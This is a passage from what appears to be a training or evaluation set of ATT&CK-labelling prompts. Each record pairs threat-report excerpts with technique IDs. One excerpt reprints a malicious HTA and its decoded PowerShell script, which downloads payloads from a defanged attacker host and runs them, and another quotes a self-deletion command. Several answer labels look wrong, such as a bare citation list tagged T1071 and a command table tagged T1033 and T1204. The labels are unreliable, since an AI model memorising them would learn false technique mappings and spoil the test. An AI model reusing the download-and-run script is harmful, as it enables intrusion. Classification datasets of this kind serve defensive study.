- Text: On June 28, 2020, our Threat Fusion team identified a new file being downloaded by the Aisino Intelligent Tax product. Rather, this new sample’s sole mission is to delete GoldenSpy and remove any trace it existed. Including the deletion of registry entries, all files and folders (including the GoldenSpy log file), and finally, the uninstaller deletes itself with the following command: cmd.exe /c del /q C:\Users\admin\AppData\Local\Temp\AWX.exe. Note the “/c” which will terminate the Windows Command-line interface after the operation is completed and “/d” which will delete without asking permission or giving any notification
- T1070.004: Indicator Removal - File Deletion
- Text: has obfuscated DLLs and functions using dummy API calls inserted between real instructions.
- T1027.001: Obfuscated Files or Information - Binary Padding
| Before being deleted, the DLL executes a string decoding routine that is designed to execute for about a minute, spiking central processing unit (CPU) usage for the regsvr32.exe process. Once the strings are decoded, the More_eggs components are decrypted, dropped to the system (normally in the %APPDATA%\Microsoft\ or %ProgramData%\Microsoft\ directories) and executed | - T1140: Deobfuscate/Decode Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Clop can make modifications to Registry keys.
- T1112: Modify Registry
- Text: BADNEWS installs a registry Run key to establish persistence.
- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder
- Text: provides access to the Windows Registry, which can be used to gather information.
- T1012: Query Registry
| CrackMapExec can create a registry key using wdigest. | - T1112: Modify Registry |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: APT29 created tokens using compromised SAML signing certificates.
- T1606.002: Forge Web Credentials - SAML Tokens
- Text: Ke3chang has dumped credentials, including by using gsecdump.
- T1003.002: OS Credential Dumping - Security Account Manager
- T1003.004: OS Credential Dumping - LSA Secrets
- Text: Indrik Spider has used PsExec to stop services prior to the execution of ransomware.
- T1489: Service Stop
| CrackMapExec can dump hashed passwords associated with Active Directory using Windows' Directory Replication Services API (DRSUAPI), or Volume Shadow Copy. | - T1003.003: OS Credential Dumping - NTDS |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: USBferry can execute various Windows commands.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: MacMa can execute supplied shell commands and uses bash scripts to perform additional actions.
- T1059.004: Command and Scripting Interpreter - Unix Shell
- Text: uses cmd.exe to execute commands on the victim’s machine.
- T1059: Command and Scripting Interpreter
| has the capability to open a remote shell and run basic commands. | - T1059: Command and Scripting Interpreter |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: SYSCON has the ability to use Systeminfo to identify system information.
- T1082: System Information Discovery
- Text: The downloader’s process termination starts with killing the DDG Monero miner botnet client if present on the system, followed by a variety of other cryptominers, including other XMRig instances. This behavior is indicative of attempting to secure more host resources from competing miners. The malware also targets services belonging to Qihoo 360, an antivirus service, in order to reduce the chance of detection. However, taskkill is unable to to kill process related to Qihoo 360. Figure 5 shows the processes that the script attempts to terminate.
- T1057: Process Discovery
- T1518.001: Software Discovery - Security Software Discovery
- Text: Milan can run `C:\Windows\system32\cmd.exe /c cmd /c ipconfig /all 2>&1` to discover network settings.
- T1016: System Network Configuration Discovery
| SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo. | - T1082: System Information Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: njRAT gathers information about opened windows during the initial infection.
- T1010: Application Window Discovery
- Text: Fysbis has the ability to search for files.
- T1083: File and Directory Discovery
- Text: PowerDuke has a command to list the victim's processes.
- T1057: Process Discovery
| DarkWatchman has the ability to enumerate file and folder names. | - T1083: File and Directory Discovery |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: 64) u= {B5B70BD7-87FC-499A-B4D1- 98163306F0D8} A GUID r= 1 Boolean value if the malware is running as injected code t= 8035187 Number of milliseconds the computer has been running Table 3
- T1055: Process Injection
- Text: The original Microsoft Excel spreadsheet is copied into the %TEMP% directory - The embedded object “xl\embeddings\oleObject1[.]bin” inside the Microsoft Excel spreadsheet is copied into the %TEMP% directory - The DLL inside oleObject1.bin is extracted and copied into %APPDATA% by the “ReadAndWriteExtractedBinFile” function - The DLL is loaded with LoadLibraryA - The DLL’s exported function, such as “Get2”, is run by the macro
- T1055.001: Process Injection - Dynamic-link Library Injection
- Text: Turla has used a custom decryption routine, which pulls key and salt values from other artifacts such as a WMI filter or PowerShell Profile, to decode encrypted PowerShell payloads.
- T1140: Deobfuscate/Decode Files or Information
| Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3 | - T1055: Process Injection |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: BitPaymer can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.
- T1070.006: Indicator Removal - Timestomp
- Text: The URL used can be found in the embedded OLE object:hxxp://old[.]jrchina[.]com/btob_asiana/udel_calcel.php?fdid=[base64_data]Here is the source code of the downloaded HTA document:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" http-equiv="Content-Type" /><title>Bonjour</title><script language="VBScript">Set owFrClN0giJ = CreateObject("Wscript.Shell")Set v1ymUkaljYF = CreateObject("Scripting.FileSystemObject")If v1ymUkaljYF.FileExists(owFrClN0giJ.ExpandEnvironmentStrings("%PSModulePath%") + "..\powershell.exe") ThenowFrClN0giJ.Run "powershell -nop -windowstyle hidden -executionpolicy bypass -encodedcommand JABjAD0AbgBlAHcALQBvA[...redacted...]H0AIAA=" ,0owFrClN0giJ.Run "cmd /c echo hta>%tmp%\webbrowser1094826604.tmp", 0End IfSelf.Close</script><hta:applicationid="oHTA"applicationname="Bonjour"application="yes"></head></html>Once decoded using the base64 algorithm, we are able to read the final payload:$c=new-object System.Net.WebClient$t =$env:temp$t1=$t+"\\alitmp0131.jpg"$t2=$t+"\\alitmp0132.jpg"$t3=$t+"\\alitmp0133.js"try { echo $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach01.jpg",$t1) $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/appach02.jpg",$t2) $c.DownloadFile( "hxxp://old[.]jrchina[.]com/btob_asiana/udel_ok.ipp",$t3) wscript.exe $t3 }catch { }The purpose of this script is to download and execute a Windows script and two encoded payloads
- T1071: Application Layer Protocol
- T1064: Scripting
- Text: APT28 has split archived exfiltration files into chunks smaller than 1MB.
- T1030: Data Transfer Size Limits
| The malware supports timestomping. | - T1070.006: Indicator Removal - Timestomp |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.
- T1059.005: Command and Scripting Interpreter - Visual Basic
- Text: Some SUGARDUMP variants required a user to enable a macro within a malicious .xls file for execution.
- T1204.002: User Execution - Malicious File
- Text: According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.
- T1566.001: Phishing - Spearphishing Attachment
- T1598.002: Phishing for Information - Spearphishing Attachment
| TrickBot has used macros in Excel documents to download and deploy the malware on the user’s machine. | - T1059.003: Command and Scripting Interpreter - Windows Command Shell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands. The group has used an exploit toolkit known as Threadkit that launches .bat files.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: Linux Rabbit maintains persistence on an infected machine through rc.local and .bashrc files.
- T1546.004: Event Triggered Execution - Unix Shell Configuration Modification
- Text: has the capability to create a reverse shell.
- T1059: Command and Scripting Interpreter
| WEBC2 can open an interactive command shell. | - T1059.003: Command and Scripting Interpreter - Windows Command Shell |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Conclusion CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing
- T1203: Exploitation for Client Execution
- Text: Operation Wocao has gained initial access via vulnerable webservers.
- T1190: Exploit Public-Facing Application
- Text: In an uninhibited Emotet infection, it’s likely the malware would have then attempted to move laterally to other machines in the environment. Malwarebytes has some good analyses of Emotet if you’re looking for further reading
- T1210: Exploitation of Remote Services
| has exploited Microsoft Word vulnerability CVE-2014-4114 for execution. | - T1203: Exploitation for Client Execution |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Emotet has been delivered by phishing emails containing attachments.
- T1566.001: Phishing - Spearphishing Attachment
- Text: On Tuesday, Jan. 11, 2022, Emotet resumed spamming after its holiday break. The emails continued with links to fake complaint pages, and the pages were sometimes customized to include the recipient’s name. This method was prevalent until Jan. 20.
- T1566.002: Phishing - Spearphishing Link
- T1566.002: Phishing - Spearphishing Link
- Text: On October 31, TA505 sent two campaigns, both using .lnk files embedded in Microsoft Word documents. As shown in Figure 4, recipients must open the attached Word document, enable editing, and then execute the .lnk file by double clicking an image in the document. They must further confirm that they want to open the .lnk file (Figure 5), which, in turn, downloads an intermediate downloader. Despite the number of steps involved, TA505 relies on light social engineering in the email and lure as well as end user conditioning to proceed through the scheme and infect their PC with malware
- T1204.002: User Execution - Malicious File
| On balance, the fall campaigns diverged from Bulgarian themed NetWire campaigns in the early summer in scope and scale. These campaigns distributed NetWire variants which used Bulgarian email lures, leveraged geofencing, and downloading EXEs through certutils. The NetWire malware has been around since at least 2002 and has been consistently in use by various actors across the threat landscape. This analysis shows groupings of similar campaigns distributing NetWire based on message attributes, email lures and language, Office document metadata, VBA Macro code, and malware configuration | - T1566.001: Phishing - Spearphishing Attachment
- T1059.005: Command and Scripting Interpreter - Visual Basic |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: An older variant of performs UAC bypass.
- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control
- Text: Empire contains modules that can discover and exploit search order hijacking vulnerabilities.
- T1574.008: Hijack Execution Flow - Path Interception by Search Order Hijacking
- Text: These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\Documents and Settings\user\Application Data\ATI_Subsystem\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb ← 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb ← 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb ← 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\system32 to its newly created %appdata%\ATI_Subsystem subdirectory as “amdocl_as32.exe” alongside the three dll’s listed above
- T1055: Process Injection
- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking
- T1218.011: System Binary Proxy Execution - Rundll32
- T1574.002: Hijack Execution Flow - DLL Side-Loading
| H1N1 bypasses user access control by using a DLL hijacking vulnerability in the Windows Update Standalone Installer (wusa.exe). | - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The second version does not carry the payload directly but instead downloads it from a C2 into the same location as before. The C2 server address is embedded in the main executable in the TinkaOTP bundle. The hardcoded download and execution code are easily visible as they are unencrypted, plain UTF strings in the binary
- T1105: Ingress Tool Transfer
- Text: Torisma uses this method to send data back to the C2 server read from the named pipe. This is the results of the execution of the shellcode on the victim’s system through the ViewPrevPage action and the results of this execution are sent and processed using this function
- T1041: Exfiltration Over C2 Channel
- Text: QuietSieve can check C2 connectivity with a `ping` to 8.8.8.8 (Google public DNS).
- T1016.001: System Network Configuration Discovery - Internet Connection Discovery
| Conficker downloads an HTTP server to the infected machine. | - T1105: Ingress Tool Transfer |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: For all non-removable drives on a victim, executes automated collection of certain files for later exfiltration.
- T1119: Automated Collection
- Text: automatically searches for files on local drives based on a predefined list of file extensions and sends them to the command and control server every 60 minutes. also automatically sends keylogger files and screenshots to the C2 server on a regular timeframe.
- T1020: Automated Exfiltration
- Text: Valak has the ability to identify the domain and the MAC and IP addresses of an infected machine.
- T1016: System Network Configuration Discovery
| Sidewinder has used tools to automatically collect system and network configuration information. | - T1119: Automated Collection |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: We at Team Nautilus detected and analyzed the Docker Hub account hildeteamtnt, which was used by TeamTNT to store their malicious images. Also, ‘minerescape’ contained a shell script executing a Python file - minedaemon.py. Using a web service (iplogger[.]org) to transmit collected data to the attacker during the discovery process, for instance, the number of cores in the CPU, its speed, system details (using uname -a), and targeted host IP address. Logging the activity and encoding it into files (using Base64). The script sbs.sh: - Downloading 00.jpg (as /usr/bin/dns_ipv4.tar.gz) which is the file /usr/bin/bioset. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). The father is responsible for deciphering messages and writing it back to the child on the PIPE. Creating a child process that listens to the socket and communicates with the father using a method called ‘Named PIPE’ (also known as FIFO). - The father is responsible for deciphering messages and writing it back to the child on the PIPE. Logging the activity and encoding it into files (using Base64). - Defense Evasion: Deleting command history. Logging the activity and encoding it into files (using Base64). Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Logging the activity and encoding it into files (using Base64). - Defense Evasion Techniques: Removing system logs (/var/log/syslog). Deleting command history. Encoding many snippets with base64 (the same snippet may be encoded multiple times). To sum it up . Over four months, TeamTNT uploaded various images, with some being used to perform attacks in the wild
- T1027: Obfuscated Files or Information
- Text: Okrum has used base64 to encode C2 communication.
- T1132.001: Data Encoding - Standard Encoding
- Text: For both the receiving of C2 commands and exfiltration, Remexi uses the Microsoft Background Intelligent Transfer Service (BITS) mechanism to communicate with the C2 over HTTP
- T1071.001: Application Layer Protocol - Web Protocols
- T1041: Exfiltration Over C2 Channel
- T1071: Application Layer Protocol
- T1132: Data Encoding
| Denis obfuscates its code and encrypts the API names. Denis also encodes its payload in Base64. | - T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: is obfuscated using the open source ConfuserEx protector. also obfuscates the name of created files/folders/mutexes and encrypts debug messages written to log files using the Rijndael cipher.
- T1027: Obfuscated Files or Information
- Text: SDBbot has the ability to use the command shell to execute commands on a compromised host.
- T1059.003: Command and Scripting Interpreter - Windows Command Shell
- Text: Blue Mockingbird has used PowerShell reverse TCP shells to issue interactive commands over a network connection.
- T1059.001: Command and Scripting Interpreter - PowerShell
| In their example, the OilRig group used a malicious macro document to deliver the backdoor, which is a tactic much more commonly used by them. A closer examination revealed the obfuscation used by the OilRig group in these QUADAGENT samples were likely the result of using an open-source toolkit called Invoke-Obfuscation. This tool was originally intended to aid defenders in simulating obfuscated PowerShell commands to better their defenses. Invoke-Obfuscation has proven to be highly effective at obfuscating PowerShell scripts and in this case, the adversary was able to take advantage of the tool for increased chances of evasion and as an anti-analysis tactic. Based on our telemetry, we have high confidence the email account used to launch this attack was compromised by the OilRig group, likely via credential theft. The file appears to have been compiled using a bat2exe tool, which will take batch files (.bat) and convert them to PE (.exe) files. Its sole purpose here is to install the QUADAGENT backdoor and execute it. The executable will drop the packaged QUADAGENT PowerShell script using the filename Office365DCOMCheck.ps1 in addition to a VBScript file with the same filename which will assist in the execution of it. Once the QUADAGENT payload has executed, it will use rdppath[.]com as the C2, first via HTTPS, then HTTP, then via DNS tunneling, each being used as a corresponding fallback channel if the former fails. This PE was slightly different from the other attack, being compiled using the Microsoft .NET Framework instead of being generated via a bat2exe tool and containing a decoy dialog box as shown in Figure 1 | - T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Cardinal RAT can log keystrokes.
- T1056.001: Input Capture - Keylogging
- Text: Cardinal RAT can collect the username from a victim machine.
- T1033: System Owner/User Discovery
- Text: OceanSalt can collect the computer name from the system.
- T1082: System Information Discovery
| collects keystrokes from the victim’s machine. | - T1056: Input Capture |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Figure 3 Targeted lure content In one of the documents, the victim is presented with what appears to be an obfuscated document with the NATO EOD seal and text alluding to the targeted nation state
- T1027: Obfuscated Files or Information
- Text: Apart from being a flexible and easy-to-use scripting language, BLADABINDI’s use of AutoIt is notable. It uses AutoIt (the FileInstall command) to compile the payload and the main script into a single executable, which can make the payload — the backdoor — difficult to detect
- T1027.004: Obfuscated Files or Information - Compile After Delivery
- Text: The first stage implant that is nested in the DOTM file, is using triple base64 encoding in the Visual Basic Macro - The extracted DLL (desktop.dat) is packed with the Themida packer attempting to make analysis more difficult
- T1027.002: Obfuscated Files or Information - Software Packing
| The downloaded Stage3 is written in C# as in Stage2, and an obfuscation tool called Eazfuscator is detected by exeinfoPE | - T1027: Obfuscated Files or Information |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Threat Group-3390 has packed malware and tools.
- T1027.002: Obfuscated Files or Information - Software Packing
- Text: APT29 has used large file sizes to avoid detection.
- T1027.001: Obfuscated Files or Information - Binary Padding
- Text: SideCopy has used a malicious loader DLL file to execute the `credwiz.exe` process and side-load the malicious payload `Duser.dll`.
- T1574.002: Hijack Execution Flow - DLL Side-Loading
| Zlh.exe is a legitimate, signed Norman Safeground AS application, which is used to sideload a malicious nflogger.dll DLL.The encrypted ZeroT payload is usually named NO.2.mui. The sideloaded DLL does not always use the same vulnerable executable, but it is always similar in functionality. Usually the DLL is not packed, but we have observed instances compressed by UPX. This malicious DLL is usually obfuscated with the same junk code: dummy API calls inserted in between real instructions (Fig. 7). The same obfuscation can be found in multiple functions in ZeroT itself | - T1027.001: Obfuscated Files or Information - Binary Padding |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: has a command to download and execute an additional file.
- T1105: Ingress Tool Transfer
- Text: POORAIM has used AOL Instant Messenger for C2.
- T1102.002: Web Service - Bidirectional Communication
- Text: CookieMiner has retrieved iPhone text messages from iTunes phone backup files.
- T1005: Data from Local System
| DnsSystem can download files to compromised systems after receiving a command with the string `downloaddd`. | - T1105: Ingress Tool Transfer |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: PcShare can upload files and information from a compromised host to its C2 servers.
- T1041: Exfiltration Over C2 Channel
- Text: Lateral movement can be done with through net use commands to connect to the on remote systems.
- T1021.002: Remote Services - SMB/Windows Admin Shares
- Text: Fox Kitten has used Google Chrome bookmarks to identify internal resources and assets.
- T1217: Browser Information Discovery
| The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\Users\[Username]\AppData\Local\Temp\notepad1.exe 00 00 01 Deletes the files: C:\Users\[Username]\AppData\Local\Temp\notepad.exe C:\Users\[Username]\AppData\Local\Temp\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID | - T1033: System Owner/User Discovery
- T1204: User Execution |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: The ZIP archive contains a malicious portable executable (PE) file with embedded HTML application (HTA). The user has to unzip the archive and double-click the executable for the infection chain to continue. The PE file is a simple HTA script compiled into an executable. When the user double-clicks the executable, the malicious HTA file is extracted to %temp% and executed by mshta.exe
- T1218.005: System Binary Proxy Execution - Mshta
- T1204.002: User Execution - Malicious File
- Text: NETWIRE can use XDG Autostart Entries to establish persistence.
- T1547.013: Boot or Logon Autostart Execution - XDG Autostart Entries
- Text: The dropper installs 2 files:netwf.bat : executes netwf.dllnetwf.dll : the payloadThe dropper implements 2 persistence mechanisms:HKCU\Environment\UserInitMprLogonScript to execute the netwf.bat fileCOM Object hijack of the following CLSID: {BCDE0395-E52F-467C-8E3D-C4579291692E}, the CLSID of the class MMDeviceEnumerator.These 2 techniques have also been previously used by this actor.Finally the payload is executed by rundll32.exe (and the ordinal #1 in argument) or by explorer.exe if the COM Object hijack is performed
- T1218.011: System Binary Proxy Execution - Rundll32
| [1] https://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/ [2] https://www.clearskysec.com/copykitten-jpost/ | - T1071: Application Layer Protocol |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: An already public UAC bypass method is included in the binary. It doesn’t matter if the method will work or not since the process will exit. This is one more indication that the tool is still in development and there are plans to expand its capabilities
- T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control
- Text: MuddyWater has used malware that has the capability to execute malicious code via COM, DCOM, and Outlook.
- T1559.001: Inter-Process Communication - Component Object Model
- Text: Empire can use PowerSploit's "Invoke-TokenManipulation" to manipulate access tokens.
- T1134: Access Token Manipulation
| InvisiMole can use fileless UAC bypass and create an elevated COM object to escalate privileges. | - T1548.002: Abuse Elevation Control Mechanism - Bypass User Account Control |
You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.
Examples:
- Text: Lokibot has the ability to discover the computer name and Windows product name/version.
- T1082: System Information Discovery
